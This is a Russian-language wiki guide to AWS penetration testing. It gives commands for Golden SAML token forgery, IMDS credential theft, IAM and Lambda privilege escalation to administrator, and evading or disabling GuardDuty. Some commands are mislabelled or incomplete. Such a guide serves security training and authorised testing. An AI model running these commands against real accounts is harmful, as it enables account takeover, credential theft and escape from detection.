Подробнее про эксплуатацию тут: https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps

==== shimit ====
https://github.com/cyberark/shimit

Установка:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
cd /tmp
python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml
git clone https://github.com/cyberark/shimit
cd shmit
python shmit.py
</syntaxhighlight>

В начале потребуется доступ к AD FS аккаунту из персонального хранилища которого украсть приватный ключ ключ.
Сделать это можно используя mimikatz, но в примере сделано через библиотеку Microsoft.Adfs.Powershell и powershell

Пример эксплуатации:
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:auto" >
# Получаем приватный ключ
[System.Convert]::ToBase64String($cer.rawdata)
(Get-ADFSProperties).Identifier.AbsoluteUri
(Get-ADFSRelyingPartyTrust).IssuanceTransformRule

# Получаем инфу о юзерах - выбираем цель
aws iam list-users

# Получаем токен
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012

# Проверяем текущий аккаунт
aws opsworks describe-my-user-profile
</syntaxhighlight>

== Проверки безопасности ==

Для администраторов преимущественно.

=== Zeus ===

https://github.com/DenizParlak/Zeus

== Другое ==

=== aws_consoler ===

https://github.com/NetSPI/aws_consoler

== All-In-One ==

=== pacu ===

https://github.com/RhinoSecurityLabs/pacu

=== ScoutSuite ===

https://github.com/nccgroup/ScoutSuite

=== cloudfox ===

https://github.com/BishopFox/cloudfox

= Ссылки =

== Статьи ==

[https://frichetten.com/blog/hijack-iam-roles-and-avoid-detection/ Hijacking IAM Roles and Avoiding Detection]

[https://frichetten.com/blog/bypass-guardduty-pentest-alerts/ Bypass GuardDuty PenTest Alerts]

[https://frichetten.com/blog/ssm-agent-tomfoolery/ Intercept SSM Agent Communications]

== Лаборатории ==

[https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6 Damn Vulnerable Cloud Application]

[https://github.com/nccgroup/sadcloud SadCloud]

[http://flaws.cloud Flaws]

[http://flaws2.cloud/ Flaws]

[https://xakep.ru/2022/03/21/htb-stacked/ HackTheBox Stacked Writeup]

[https://github.com/RhinoSecurityLabs/cloudgoat CloudGoat]

[https://github.com/nccgroup/sadcloud SadCloud]

[https://www.wellarchitectedlabs.com/security/ AWS Well-Architected Labs]

[https://labs.withsecure.com/publications/attack-detection-fundamentals-2021-aws-lab-1 Attack Detection Fundamentals 2021: AWS - Lab #1]

[https://pentesting.cloud/ Free AWS Security Labs]

== Краткие заметки ==

[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md PayloadAllTheThings]

[https://book.hacktricks.xyz/pentesting/pentesting-web/buckets/aws-s3 hacktricks-s3]

[https://book.hacktricks.xyz/cloud-security/aws-security hacktricks-aws]

[https://learntocloud.guide/#/phase5/README learntocloud(много ссылок)]

== Книги ==

[https://www.amazon.com/dp/1789136725/ Hands-On AWS Penetration Testing with Kali Linux]

Aws

2022-10-07T16:52:38Z

Drakylar: /* Службы */

AWS - Amazon Web Service. Одна из первых облачных систем, состоящая из многих сервисов, которые при некорректной настройке оставляют дыры в безопасности.

= Организационные моменты =

При проведении тестирования на проникновение, требуется предупредить AWS (составить заявку).

Подробнее тут: https://aws.amazon.com/ru/security/penetration-testing/

= Общие концепции =

== Службы ==

Концепция служб в AWS позволяет автоматизировать многие процессы, включая саму разработку архитектуры.

Это экосистема многих сервисов. И AWS стремится увеличить их количество.

Например, связать сервис сбора логов и сервис по реагированию на инциденты, а результаты класть на сервис S3.

== Регионы ==

AWS разделен на регионы. Часть сервисов кросс-региональные, но большинство привязываются к конкретным регионам.

{| class="wikitable"
|+Регионы AWS
|-
| '''Название региона'''
| '''Endpoint(HTTPS)'''
|-
|us-east-2
|rds.us-east-2.amazonaws.com

rds-fips.us-east-2.api.aws

rds.us-east-2.api.aws

rds-fips.us-east-2.amazonaws.com
|-
|us-east-1
|rds.us-east-1.amazonaws.com

rds-fips.us-east-1.api.aws

rds-fips.us-east-1.amazonaws.com

rds.us-east-1.api.aws
|-
|us-west-1
|rds.us-west-1.amazonaws.com

rds.us-west-1.api.aws

rds-fips.us-west-1.amazonaws.com

rds-fips.us-west-1.api.aws
|-
|us-west-2
|rds.us-west-2.amazonaws.com

rds-fips.us-west-2.amazonaws.com

rds.us-west-2.api.aws

rds-fips.us-west-2.api.aws
|-
|af-south-1
|rds.af-south-1.amazonaws.com

rds.af-south-1.api.aws
|-
|ap-east-1
|rds.ap-east-1.amazonaws.com

rds.ap-east-1.api.aws
|-
|ap-southeast-3
|rds.ap-southeast-3.amazonaws.com
|-
|ap-south-1
|rds.ap-south-1.amazonaws.com

rds.ap-south-1.api.aws
|-
|ap-northeast-3
|rds.ap-northeast-3.amazonaws.com

rds.ap-northeast-3.api.aws
|-
|ap-northeast-2
|rds.ap-northeast-2.amazonaws.com

rds.ap-northeast-2.api.aws
|-
|ap-southeast-1
|rds.ap-southeast-1.amazonaws.com

rds.ap-southeast-1.api.aws
|-
|ap-southeast-2
|rds.ap-southeast-2.amazonaws.com

rds.ap-southeast-2.api.aws
|-
|ap-northeast-1
|rds.ap-northeast-1.amazonaws.com

rds.ap-northeast-1.api.aws
|-
|ca-central-1
|rds.ca-central-1.amazonaws.com

rds.ca-central-1.api.aws

rds-fips.ca-central-1.api.aws

rds-fips.ca-central-1.amazonaws.com
|-
|eu-central-1
|rds.eu-central-1.amazonaws.com

rds.eu-central-1.api.aws
|-
|eu-west-1
|rds.eu-west-1.amazonaws.com

rds.eu-west-1.api.aws
|-
|eu-west-2
|rds.eu-west-2.amazonaws.com

rds.eu-west-2.api.aws
|-
|eu-south-1
|rds.eu-south-1.amazonaws.com

rds.eu-south-1.api.aws
|-
|eu-west-3
|rds.eu-west-3.amazonaws.com

rds.eu-west-3.api.aws
|-
|eu-north-1
|rds.eu-north-1.amazonaws.com

rds.eu-north-1.api.aws
|-
|me-south-1
|rds.me-south-1.amazonaws.com

rds.me-south-1.api.aws
|-
|sa-east-1
|rds.sa-east-1.amazonaws.com

rds.sa-east-1.api.aws
|-
|us-gov-east-1
|rds.us-gov-east-1.amazonaws.com
|-
|us-gov-west-1
|rds.us-gov-west-1.amazonaws.com
|}

Или только регионы (могут пригодиться при переборе):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
us-east-2
us-east-1
us-west-1
us-west-2
af-south-1
ap-east-1
ap-southeast-3
ap-south-1
ap-northeast-3
ap-northeast-2
ap-southeast-1
ap-southeast-2
ap-northeast-1
ca-central-1
eu-central-1
eu-west-1
eu-west-2
eu-south-1
eu-west-3
eu-north-1
me-south-1
sa-east-1
us-gov-east-1
us-gov-west-1
</syntaxhighlight>

== Доступы ==

== Консольная утилита(awscli) ==

Чаще всего для взаимодействия с сервисами AWS вам потребуется консольная утилита awscli.

Утилита работает с настроенными профилями.

=== Файлы ===

==== ~/.aws/credentials ====

Файл с учетными данными профилей. Перефразирую: получив данные из этого файла вы, вероятнее всего, получите контроль над аккаунтами в нем.

У каждого профиля будет указан:

* Access Key ID - 20 случайных букв/цифр в верхнем регистре, часто начинается с "AKIA..."

* Access Key - 40 случайных символов различного регистра.

* Access Token - не всегда указывается

Полный список параметров можно посмотреть тут: https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-files.html#cli-configure-files-settings

Пример содержимого файла (сохранен профиль default):

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
aws_access_key_id=AKIAIOSFODNN7EXAMPLE
aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
aws_session_token = AQoEXAMPLEH4aoAH0gNCAPyJxz4BlCFFxWNE1OPTgk5TthT+FvwqnKwRcOIfrRh3c/LTo6UDdyJwOOvEVPvLXCrrrUtdnniCEXAMPLE/IvU1dYUg2RVAJBanLiHb4IgRmpRV3zrkuWJOgQs8IZZaIv2BXIa2R4Olgk
</syntaxhighlight>

==== ~/.aws/config ====

Файл с региональными настройками профиля(регион по-умолчанию).
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
region=us-west-2
output=json
</syntaxhighlight>

==== ~/.aws/cli/cache ====

Закешированные учетные данные

==== ~/.aws/sso/cache ====

Закешированные данные Single-Sign-On

=== Команды ===

Общее построение команды выглядит как:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws <название_сервиса> <действие> <дополнительные_аргументы>
</syntaxhighlight>

Примеры:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Вывести все S3-хранилища.
aws s3 ls

# Создание нового пользователя - сервис IAM
aws iam create-user --user-name aws-admin2
</syntaxhighlight>

== IMDS (Instance Metadata Service) ==

Это http API для запросов из EC2. Полезно если, например, у вас есть уязвимость SSRF в EC2.

Есть 2 версии:

*IMDSv1 - версия 1 по-умолчанию, не требует токен.

*IMDSv2 - версия 2, для запросов требуется токен.

Запрос без токена:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
curl http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Запрос с токеном:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` && curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Кроме доп. информации можно получить access-token для доступа в AWS с сервисного аккаунта ec2 (только для IMDSv2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# В начале делаем запрос на директорию /security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Потом выбираем нужный аккаунт и делаем запрос на него
http://169.254.169.254/latest/meta-data/iam/security-credentials/test-account
</syntaxhighlight>

Пример ответа:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Code" : "Success",
"LastUpdated" : "2019-12-03T07:15:34Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "xxxxxxxxxxxxxxxxxxx",
"SecretAccessKey" : "xxxxxxxxxxxxxxxxxxxxx",
"Token" : "xxxxxxxxxxxxxxxxxxxxx",
"Expiration" : "2019-12-03T13:50:22Z"
}
</syntaxhighlight>
После чего эти учетные данные можно использовать с awscli.

Другие полезные Endpoint'ы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://169.254.169.254/
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
http://169.254.169.254/latest/dynamic/instance-identity/document
</syntaxhighlight>

= Ролевая модель =

Почти все описание доступа идет через ролд. А роли в свою очередь состоят из двух типов политик:

* trust policy - определяет, чья будет роль

* permissions policy - определяет какой доступ будет у тех, у кого эта роль.

Каждая политика состоит из следующих компонентов:

* Ресурс - цель, кому выдается правило. Может быть:
** Пользователь
** Группа, в которой могут быть аккаунты по какому то признаку
** Другая политика.

* Роль(Action) - какое-либо действие (например, iam:ListGroupPolicies - посмотреть список груповых политик)

* Тип правила(Effect) - разрешение или запрет.

* Политика(Policy) - совокупность Роль(действие) -> разрешение/запрет -> Ресурс(кому).

* Условия(Condition) - отдельные условия, например, ip.

Пример политики:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Version": "2012-10-17", //Версия политики
"Statement": [
{
"Sid": "Stmt32894y234276923" //Опционально - уникальный идентификатор
"Effect": "Allow", //Разрешить или запретить
"Action": [ //Разрешенные/Запрещенные действия
"ec2:AttachVolume",
"ec2:DetachVolume"
],
"Resource": [ //На какие ресурсы можно/нельзя совершать действия
"arn:aws:ec2:*:*:volume/*",
"arn:aws:ec2:*:*:instance/*"
],
"Condition": { //Опционально - условия срабатывания
"ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
}
}
]
}
</syntaxhighlight>

== Определение ролей ==

=== Вручную ===
TODO команды по определению своих ролей

=== Автоматизированно ===

== Эксплуатация ==

Когда вы определили, какие роли у вас есть, перейдите выше на соответствующий сервис, к которому идет данная роль и прочтите как ее эксплуатировать.

Тут будут отдельные роли, которые не прикреплены ни к одному сервису.

=== Административный доступ ===

Как выглядит роль с административным доступом:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
"Statement": [
{
"Effect": "Allow",
"Action": [
"*"
],
"Resource": "*"
}
]
</syntaxhighlight>

= Службы =

== IAM ==

Сервис по обеспечению контроля доступа. Подробнее про ролевую модель можно почитать в соответствующей главе.

=== Роли - повышение привилегий ===

==== iam:UpdateLoginProfile ====

Сбросить пароль у других пользователей:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam update-login-profile --user-name target_user --password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:PassRole + ec2:RunInstance ====

См. EC2

==== iam:PassRole + glue:CreateDevEndpoint ====

См. Glue

=== Роли - повышение до админа ===

==== iam:AddUserToGroup ====

Добавить юзера в административную группу:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam add-user-to-group --group-name <название_группы> --user-name <логин>
</syntaxhighlight>

==== iam:PutUserPolicy ====

Право добавить своб политику к ранее скомпрометированным обьектам.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam put-user-policy --user-name <логин> --policy-name my_inline_policy --policy-document file://path/to/administrator/policy.json
</syntaxhighlight>

==== iam:CreateLoginProfile ====

Привилегия для создания профиля(с паролем) для аккаунта, выставить новый пароль и перейти под этого пользователя.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam create-login-profile --user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:UpdateLoginProfile ====

Добавить существующую политику к любому пользователю.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachGroupPolicy ====

Добавить существующую политику к любой группе.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachRolePolicy ====

Добавить существующую политику к любой роли.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-role-policy --role-name role_i_can_assume --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:CreatePolicy ====

Создать административную политику.

==== iam:AddUserToGroup ====

Добавить пользователя в группу администраторов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam add-user-to-group --group-name target_group --user-name my_username
</syntaxhighlight>

==== iam:CreatePolicyVersion + iam:SetDefaultPolicyVersion ====

Позволяет поменять политику, выставленную администраторами сети и применить ее, после чего повысить привилегии у обьекта.

Например, если у вас это право, то вы можете создать произвольную политику, дающую полный доступ и применить ее.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание политики
aws iam create-policy-version --policy-arn target_policy_arn --policy-document file://path/to/administrator/policy.json --set-as-default
# Установка политики по умолчанию.
aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2
</syntaxhighlight>

==== iam:PassRole + ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile ====

См. EC2

== AWS Shield ==

Сервис для защиты от DDoS.

== Cognito ==

Позволяет быстро и просто добавлять возможности регистрации, авторизации и контроля доступа пользователей в мобильные и интернет-приложения.

=== Основное ===

Cognito отвечает за следующие действия:

* Регистрация пользователя (email + пароль)

* Авторизация пользователя

* Работа с сохраненной пользовательской информацией (устанавливается приложением)

* Специальные действия (например, предоставление AWS-ключей)

Все общение идет по HTTP(s). Особенность системы в том, что Cognito общается как напрямую с чужим веб-сайтом, так и напрямую с клиентским браузером. То есть веб-сервер не знает, какой был передан пароль (в нормальной реализации).

Пример URL: cognito-identity.us-east-1.amazonaws.com

За действие отвечает HTTP-заголовок "X-Amz-Target". В своем роде, это Endpoints API.

Какие параметры требуются для работы с ним:

1. Название Endpoint'а - "X-Amz-Target" заголовок

2. Регион - "aws_project_region" параметр

3. Session token - позже требуется для запросов.

4. Identity Pool ID - нужен для запросов типа Identity Pools.

Также пишут, что Cognito разделяется на две основные части:

* User Pools - для тех, кому нужна только регистрация и аутентификация

* Identity Pools - для тех, кому еще и нужен доступ к AWS-ресурсам.

=== X-Amz-Target (Endpoints) ===

==== AWSCognitoIdentityService.UpdateUserAttributes ====

У каждого пользователя есть поля, которые могут быть установлены самим пользователем (например, фамилия или дата рождения). Но также это могут быть и критичные поля, такие, как ID пользователя, администратор ли он и так далее.

Также раньше можно было менять поле email'а пользователя (0day): https://infosecwriteups.com/hacking-aws-cognito-misconfiguration-to-zero-click-account-takeover-36a209a0bd8a

Важно! Указано, что могут быть отправки СМС-уведомлений, так что тестировать осторожно.

P.S. Мб неверно название Endpoint'а. Надо проверять.

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Позволяет получить AWS ключи для работы с AWS-консолью. По-умолчанию отключено.

Требуется aws_identity_pool_id.

В некоторых примерах оно также было указано как "com.amazonaws.cognito.identity.model.AWSCognitoIdentityService.GetCredentialsForIdentity"

Подробнее тут: https://blog.appsecco.com/exploiting-weak-configurations-in-amazon-cognito-in-aws-471ce761963

==== AWSCognitoIdentityService.GetOpenIdToken ====

Позволяет получить OpenID токен, действительный на 10 минут.

В примере требуется только "IdentityID"

==== AWSCognitoIdentityService.GetOpenIdTokenForDeveloperIdentity ====

Тоже позволяет получить OpenID токен, действительный на 10 минут. Но также создает новый "IdentityID" (если он не был указан).

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Получить учетные данные пользователя по IdentityID: SecretKey, SessionToken, AccessKeyID.

https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetCredentialsForIdentity.html

== GuardDuty ==

Сервис для детектирования атак используя машинное обучение.

Для детекта использует следующие сервисы:

* CloudTrail
* VPC Flow Logs
* DNS Logs
* ...to be continued

=== Обход защиты ===

Далее идут правила детекта и то, как их можно обойти.

==== UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration ====

Детектит, если AWS-API команды были запущены за пределами EC2 (используя токен этого EC2).

Правило эффективно, если хакер хочет украть токен с EC2 и использовать его вне EC2 (например, если есть только SSRF).

Обход простой: создать свой EC2-инстанс и делать API-запросы с полученными учетными данными жертвы.
Тогда правило не сработает, даже если учетные данные не принадлежат данной EC2 тк правило проверяет source ip и является ли он EC2.

Может быть для этого выгодно держать проксирующий сервер EC2.

==== UserAgent rules ====

Суть в том, что GuardDuty будет добавлять Alert если AWS-CLI использует UserAgent например Kali.
Варианты:

* Использовать утилиту pacu (уже есть смена User-Agent)

* Отредактировать botocore(https://github.com/boto/botocore) по пути /usr/local/lib/python3.7/dist-packages/botocore/session.py: поменять platform.release() на строку юзерагента.

=== Роли - Управление ===

Список ролей: https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonguardduty.html

==== guardduty:UpdateDetector ====

Позволяет выключить GuardDuty (ну или редатировать правила):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty update-detector --detector-id <id of detector> --no-enable
</syntaxhighlight>
==== guardduty:DeleteDetector ====

Удалить правило детектирования:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty delete-detector --detector-id <id of detector>
</syntaxhighlight>

== STS (Security Token Service) ==

Сервис, позволяющий запросить временные учетные данные с ограниченными примилегиями для IAM-пользователей

== KMS (Key Management Service) ==

Сервис для создания криптографических ключей, управления ими и использования их в других сервисах.

Администраторы амазона не смогут получить к ним доступ.

Ключи со временем обновляются:

* Customers keys - раз в 365 дней

* AWS keys - раз в 3 года.

Старые ключи также можно будет использовать для расшифровки.

== CloudHSM (Hardware Security Module) ==

Замена KMS для богатых и тех, кто хочит побольше безопасности. Хранилище ключей, прикрепленное к аппаратному решению.

Пишут, что устройство будет закреплено только за вами.

Также можно получить доступ к CloudHSM-Instance по SSH.

== Athena ==

Интерактивный бессерверный сервис, позволяющий анализировать данные хранилища S3 стандартными средствами SQL.

Умеет работать с шифрованными S3 и сохранять шифрованный вывод.

== EBS (Elastic Block Store) ==

Сервис блочного хранилища (просто жесткий диск, который можно примонтировать).

=== Роли - управление сервисом ===

==== ec2:CreateVolume + ec2:AttachVolume ====

Возможность подключить EBS-Volume/Snapshot к EC2-виртуалке.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание Volume из snapshot'а (если требуется подключить snapshot)
aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone
# Подключение Volume к виртуалке EC2
</syntaxhighlight>

Далее идем на виртуалку и вводим команды:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Поиск Volume
lsblk
# Проверка есть ли на нем данные
sudo file -s /dev/xvdf
# форматировать образ под ext4 (если неподходящая файловая система)
sudo mkfs -t ext4 /dev/xvdf
# Создаем директорию куда примонтируем позже
sudo mkdir /tmp/newvolume
# Монтируем
sudo mount /dev/xvdf /tmp/newvolume/
</syntaxhighlight>

Диск будет доступен на /tmp/newvolume.

== Lambda ==

Сервис для запуска своего кода в облаке.

=== Роли - повышение привилегий ===

==== lambda:UpdateFunctionCode ====

Позволяет поменять запущенный код, тем самым получив контроль над ролями, прикрепленными к этому коду:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws lambda update-function-code --function-name target_function --zip-file fileb://my/lambda/code/zipped.zip
</syntaxhighlight>

==== lambda:CreateFunction + lambda:InvokeFunction + iam:PassRole ====

Позволяет создать функцию и прикрепить к ней произвольную роль, после чего запустить.

Код функции:
<syntaxhighlight lang="python" line="1" enclose="div" style="overflow-x:scroll" >
import boto3
def lambda_handler(event, context):
client = boto3.client('iam')
response = client.attach_user_policy(
UserName='my_username',
PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
)
return response
</syntaxhighlight>

Команды для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание функции
aws lambda create-function --function-name my_function --runtime python3.6 --role arn_of_lambda_role --handler lambda_function.lambda_handler --code file://my/python/code.py
# Запуск
aws lambda invoke --function-name my_function output.txt
</syntaxhighlight>

=== Роли - управление ===

==== lambda:GetFunction ====

Также может понадобиться lambda:ListFunctions чтобы не перебирать названия функций.

Позволяет прочитать исходный код функции (в котором например может быть секрет сохранен):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получить список функций
aws lambda list-functions --profile uploadcreds
# Получить информацию о Lambda-функции
aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds
# Скачать исходный код по ссылке из предыдущего ответа
wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
</syntaxhighlight>

== Glue ==

Бессерверная служба интеграции данных, упрощающая поиск, подготовку и объединение данных для анализа, машинного обучения и разработки приложений.

=== Роли - повышение привилегий ===

==== glue:UpdateDevEndpoint ====

Позволяет обновить параметры Glue Development Endpoint, тем самым получив контроль над ролями, прикрепленными к этому Glue Development Endpoint:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# TODO: это не обновление параметров, надо обновить команду
aws glue --endpoint-name target_endpoint --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

==== glue:CreateDevEndpoint + iam:PassRole ====

Позволяет получить доступ к ролям, которые прикреплены к любому сервису Glue:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws glue create-dev-endpoint --endpoint-name my_dev_endpoint --role-arn arn_of_glue_service_role --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

== S3 ==

Файловое хранилище, доступное по http(s).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{bucket_name}.s3.amazonaws.com
https://s3.amazonaws.com/{bucket_name}/

# US Standard
http://s3.amazonaws.com
# Ireland
http://s3-eu-west-1.amazonaws.com
# Northern California
http://s3-us-west-1.amazonaws.com
# Singapore
http://s3-ap-southeast-1.amazonaws.com
# Tokyo
http://s3-ap-northeast-1.amazonaws.com
</syntaxhighlight>

Делать запросы можно:

* В браузере - http(s)

* Используя awscli:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

В S3 может использоваться шифрование:

* SSE-KMS - Server-Side с ключами KMS

* SSE-C - Server-Side с ключами заказчика

* CSE-KMS - Client-Side с ключами KMS

* CSE-C - Client-Side с ключами заказчика

=== Сбор информации ===

==== Определение региона ====

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
$ dig flaws.cloud
;; ANSWER SECTION:
flaws.cloud. 5 IN A 52.218.192.11

$ nslookup 52.218.192.11
Non-authoritative answer:
11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com

# Итоговый URL будет:
flaws.cloud.s3-website-us-west-2.amazonaws.com
flaws.cloud.s3-us-west-2.amazonaws.com
</syntaxhighlight>
Если будет некорректный регион - редиректнет на корректный.

==== Список файлов ====

На S3-Bukket может быть включен листинг директорий, для этого достаточно перейти в браузере на хранилище и посмотреть возвращенный XML.

Список файлов может быть включен отдельно на определенные директории, поэтому может потребоваться брут директорий используя, например, wfuzz (подстрока AccessDenied).

=== Роли - управление ===

==== s3:ListBucket ====

Посмотреть список файлов в S3-хранилище:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

==== s3:ListAllMyBuckets ====

Посмотреть список всех S3-хранилищ, доступных мне:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3api list-buckets
aws s3 ls
</syntaxhighlight>

== CloudFront ==

Сервис сети доставки контента (CDN).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.cloudfront.net
</syntaxhighlight>

== EC2 (Elastic Compute Cloud) ==

EC2 (Amazon Elastic Compute Cloud) == VPS

Состоит из:

* Instance - название виртуальной машины

* AMI (Amazon Machine Image) - образ виртуальной машины

* SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
ec2-{ip-seperated}.compute-1.amazonaws.com
</syntaxhighlight>

=== SSM Agent ===

Как уже выше написано, SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Его тоже можно выбрать целью атаки

==== MITM ====

Есть возможность вклиниваться в общение от SSM-Агента локально.

PoC: https://github.com/Frichetten/ssm-agent-research/tree/main/ssm-session-interception

Полная статья: https://frichetten.com/blog/ssm-agent-tomfoolery/

=== Роли - повышение привилегий ===

==== ec2:RunInstance + iam:PassRole ====

Позволяет прикрепить существующую роль к скомпрометированной EC2-машине.

1. Запуск машины c новой прикрепленной ролью

2. Подключение к ней

3. Работа с прикрепленной ролью

Создание EC2 с известным SSH-ключем:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --key-name my_ssh_key --security-group-ids sg-123456
</syntaxhighlight>

Второй вариант - скрипт для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --user-data file://script/with/reverse/shell.sh
</syntaxhighlight>

Важно! Может спалиться с GuardDuty когда учетные данные пользователя будут использованы на стороннем инстансе EC2.

=== Роли - повышение до админа ===

==== ec2:AssociateIamInstanceProfile ====

Позволяет менять IAM политики/роли/пользователей

==== ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile + iam:PassRole ====

